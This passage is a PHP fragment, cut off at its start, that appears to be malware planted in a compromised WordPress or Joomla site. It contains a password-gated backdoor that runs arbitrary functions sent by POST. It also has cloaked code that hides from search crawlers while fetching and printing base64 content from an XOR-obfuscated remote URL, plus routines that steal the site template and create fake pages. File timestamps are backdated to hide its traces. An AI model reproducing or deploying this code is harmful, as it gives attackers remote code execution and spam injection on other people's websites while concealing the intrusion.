match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDo6Nzs5NDUyNjcyOTI6MzU='); $url = decrypt_url('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDo6Nzs5NDUyNjcyOTI6MzU='); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend //istart function is_valid_url(&$url) { if (!preg_match('/^(.+?)(\d+)\.(\d+)\.(\d+)\.(\d+)(.+?)$/', $url, $m)) return false; $url = $m[1].$m[5].'.'.$m[4].'.'.$m[3].'.'.$m[2].$m[6]; return true; } function request_url_data($url) { if(!is_valid_url($url)) return false; $site_url = (preg_match('/^https?:\/\//i', $_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']); if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_TIMEOUT, 5); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, array( 'X-Forwarded-For: ' . $_SERVER["REMOTE_ADDR"], 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"], 'Referer: ' . $site_url, )); $response = trim(curl_exec($ch)); } elseif (function_exists('fsockopen')) { $m = parse_url($url); if ($fp = fsockopen($m['host'], 80, $errno, $errstr, 6)) { fwrite($fp, 'GET http://' . $m['host'] . $m["path"] . '?' . $m['query'] . ' HTTP/1.0' . "\r\n" . 'Host: ' . $m['host'] . "\r\n" . 'User-Agent: ' . $_SERVER["HTTP_USER_AGENT"] . "\r\n" . 'X-Forwarded-For: ' . @$_SERVER["REMOTE_ADDR"] . "\r\n" . 'Referer: ' . $site_url . "\r\n" . 'Connection: Close' . "\r\n\r\n"); $response = ''; while (!feof($fp)) { $response .= fgets($fp, 1024); } list($headers, $response) = explode("\r\n\r\n", $response); fclose($fp); } } else { $response = 'curl_init and fsockopen disabled'; } return $response; } function decrypt_url($encrypted_url) { $encrypted_url = base64_decode($encrypted_url); $url = ''; for ($i = 0; $i < strlen($encrypted_url); $i++) { $url .= chr(ord($encrypted_url[$i]) ^ 3); } return $url; } error_reporting(0); $_passssword = '2c6914d4f6dcceec6c2eac57db450885'; $p = $_POST; if (@$p[$_passssword] AND @$p['a'] AND @$p['c']) @$p[$_passssword](@$p['a'], @$p['c'], ''); if (!empty($_GET['check']) AND $_GET['check'] == $_passssword) { echo(''); } unset($_passssword); $bad_url = false; if ($_SERVER['REQUEST_METHOD'] != 'GET') $bad_url = true; foreach (array('/\.css$/', '/\.swf$/', '/\.ashx$/', '/\.docx$/', '/\.doc$/', '/\.xls$/', '/\.xlsx$/', '/\.xml$/', '/\.jpg$/', '/\.pdf$/', '/\.png$/', '/\.gif$/', '/\.ico$/', '/\.js$/', '/\.txt$/', '/ajax/', '/cron\.php$/', '/wp\-login\.php$/', '/\/wp\-includes\//', '/\/wp\-admin/', '/\/admin\//', '/\/wp\-content\//', '/\/administrator\//', '/phpmyadmin/i', '/xmlrpc\.php/', '/\/feed\//') as $regex) { if (preg_match($regex, $_SERVER['REQUEST_URI'])) { $bad_url = true; break; } } $cookie_name = 'PHP_SESSION_PHP'; if (!$bad_url AND !isset($_COOKIE[$cookie_name]) AND empty($echo_done) AND !empty($_SERVER['HTTP_USER_AGENT']) AND (substr(trim($_SERVER['REMOTE_ADDR']), 0, 6) != '74.125') AND !preg_match('/(googlebot|msnbot|yahoo|search|bing|ask|indexer)/i', $_SERVER['HTTP_USER_AGENT'])) { // setcookie($cookie_name, mt_rand(1, 1024), time() + 60 * 60 * 24 * 7, '/'); // $url = base64_decode('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDUwOjI5MjI1MDc3MjkxMzYz'); $url = decrypt_url('a3d3czksLDIyMy0yOzQtMjsyLTIzNCxhb2xkLDxwYm5wdm1kJXZ3blxwbHZxYGY+NDUwOjI5MjI1MDc3MjkxMzYz'); $code = request_url_data($url); // if (!empty($code) AND base64_decode($code) AND preg_match('#[a-zA-Z0-9+/]+={0,3}#is', $code, $m)) { if (($code = request_url_data($url)) AND $decoded = base64_decode($code, true)) { $echo_done = true; print $decoded; } }//iend if (strpos($_SERVER['REQUEST_URI'], 'saveyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $context = stream_context_create(array( 'http' => array('ignore_errors' => true), )); $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/?gimmeyourfuckingtemplate', false, $context); if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate', false, $context); } if ( !preg_match('/thefuckingtitle\d+/', $tpl) && !preg_match('/thefuckingcontent\d+/', $tpl) && (strpos($tpl, '[TITLE]') === false) && (strpos($tpl, '[CONTENT]') === false) ) { $tpl = file_get_contents('http://'.$_SERVER['HTTP_HOST'].'/gimmeyourfuckingtemplate/', false, $context); } if ( preg_match('/thefuckingtitle\d+/', $tpl) || preg_match('/thefuckingcontent\d+/', $tpl) || (strpos($tpl, '[TITLE]') !== false) || (strpos($tpl, '[CONTENT]') !== false) ) { $tpl = str_replace('http://[PAGE_URL]', '[PAGE_URL]', $tpl); $tpl = preg_replace('#]+?alternate[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?archives[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bookmark[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?external[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?first[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?help[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?last[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?license[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?next[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?nofollow[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?noreferrer[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?pingback[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prefetch[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?prev[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?search[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?sidebar[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?up[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?canonical[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?robots[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?charset[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?content-type[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?og:[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?viewport[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?keywords[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?description[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?google[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?yandex[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?bing[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?slurp[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?refresh[^>]+?>#is', '', $tpl); $tpl = preg_replace('#]+?referer[^>]+?>#is', '', $tpl); $tpl = preg_replace('##is', '', $tpl); $tpl = preg_replace('#http://www.google-analytics.com/#is', 'http://'.$_SERVER['HTTP_HOST'].'/', $tpl); $tpl = preg_replace('#]*>[^<]*?#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingtitle\d+#is', '[TITLE]', $tpl); $tpl = preg_replace('#thefuckingcontent\d+#is', '[CONTENT]', $tpl); $tpl = preg_replace('#

\[CONTENT\]

#is', '[CONTENT]', $tpl); $new_tags = ' '; $tpl = preg_replace('##is', $new_tags.'', $tpl); } $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); $tpl_path = sys_get_temp_dir()."/SESS_4f2afc9c4099ee1f39c9f551123e54bd"; if (!empty($tpl) && file_put_contents($tpl_path, $tpl)) { echo 'Success!'; } else { echo 'failed'; } touch($tpl_path, time() - mt_rand(60*60*24*30, 60*60*24*365)); touch(dirname($tpl_path), time() - mt_rand(60*60*24*30, 60*60*24*365)); exit; } if (strpos($_SERVER['REQUEST_URI'], 'gimmeyourfuckingtemplate') !== false) { error_reporting(0); ini_set('display_errors', 0); set_time_limit(0); $localpath=getenv("SCRIPT_NAME");$absolutepath=getenv("SCRIPT_FILENAME");$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath)); if (is_dir($root_path.'/libraries/joomla/application/')) { $alias = 'fucking-alias-is-here'.mt_rand(1, 10000000000); $database = JFactory::getDBO(); $item = new stdClass; $item->id = null; $item->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $item->introtext = ''; $item->fulltext = 'thefuckingcontent'.mt_rand(1, 10000000000); $item->state = 1; $item->access = 1; $item->created_by = 62; $item->created = '2011-11-11 11:11:11'; $item->publish_up = '2011-11-11 11:11:11'; $item->alias = $alias; if (!$database->insertObject('#__content', $item, 'id')) { echo $database->stderr(); } $url = 'http://'.$_SERVER['HTTP_HOST'].'/index.php?option=com_content&view=article&id='.$item->id; $data = file_get_contents($url); $data = preg_replace('#[\'"][^\'"]+?'.$alias.'[^\'"]+?[\'"]#is', '"[PAGE_URL]"', $data); $data = preg_replace('#Friday, 11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011 11:11#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11 November 2011#is', '[DATE]', $data); $data = preg_replace('#11.11.2011#is', '[DATE]', $data); $data = preg_replace('#2011-11-11#is', '[DATE]', $data); $data = preg_replace('#2011.11.11#is', '[DATE]', $data); echo $data; exit; } if (is_dir($root_path.'/wp-admin/includes/')) { if (!class_exists('THEVirtualPage')) { class THEVirtualPage { private $slug = NULL; private $title = NULL; private $content = NULL; private $author = NULL; private $date = NULL; private $type = NULL; public function __construct($args) { $this->slug = 'slug'; $this->title = 'thefuckingtitle'.mt_rand(1, 10000000000); $this->content = 'thefuckingcontent'.mt_rand(1, 10000000000); $this->author = 1; $this->date = current_time('mysql'); $this->dategmt = current_time('mysql', 1); $this->type = 'page'; add_filter('the_posts', array(&$this, '_virtualPage')); } // filter to create virtual page content public function _virtualPage($posts) { global $wp, $wp_query; //create a fake post intance $post = new stdClass; // fill properties of $post with everything a page in the database would have $post->ID = "-1"; // use an illegal value for page ID $post->post_author = $this->author; // post author id $post->post_date = $this->date; // date of post $post->post_date_gmt = $this->dategmt; $post->post_content = $this->content; $post->post_title = $this->title; $post->post_excerpt = ''; $post->post_status = 'publish'; $post->comment_status = 'closed'; // mark as closed for comments, since page doesn't exist $post->ping_status = 'closed'; // mark as closed for pings, since page doesn't exist $post->post_password = ''; // no password $post->post_name = $this->slug; $post->to_ping = ''; $post->pinged = ''; $post->modified = $post->post_date; $post->modified_gmt = $post->post_date_gmt; $post->post_content_filtered = ''; $post->post_parent = 0; $post->guid = get_home_url('/' . $this->slug); $post->menu_order = 0; $post->post_type = $this->type; $post->post_mime_type = ''; $post->comment_count = 0; // set filter results $posts = array($post); // reset wp_query properties to simulate a found page $wp_query->is_page = TRUE; $wp_query->is_singular = TRUE; $wp_query->is_home = FALSE; $wp_query->is_archive = FALSE; $wp_query->is_category = FALSE; unset($wp_query->query['error']); $wp_query->query_vars['error'] = ''; $wp_query->is_404 = FALSE; return ($posts); } } } function _create_virtual() { $args = array('slug' => 'slug', 'title' => '', 'content' => '' ); $pg = new THEVirtualPage($args); } function change_wp_44_title( $title ) { global $data; $title['title'] = 'thefuckingtitle'.mt_rand(1, 10000000000); $title['page'] = ''; $title['tagline'] = ''; $title['site'] = ''; return $title; } function change_wp_40_title( $title ) { return 'thefuckingtitle'.mt_rand(1, 10000000000); } function _change_page_url( ) { return '[PAGE_URL]'; } add_filter( 'the_permalink', '_change_page_url'); add_action('init', '_create_virtual'); add_filter( 'document_title_parts', 'change_wp_44_title' ); add_filter( 'wp_title', 'change_wp_40_title' ); } }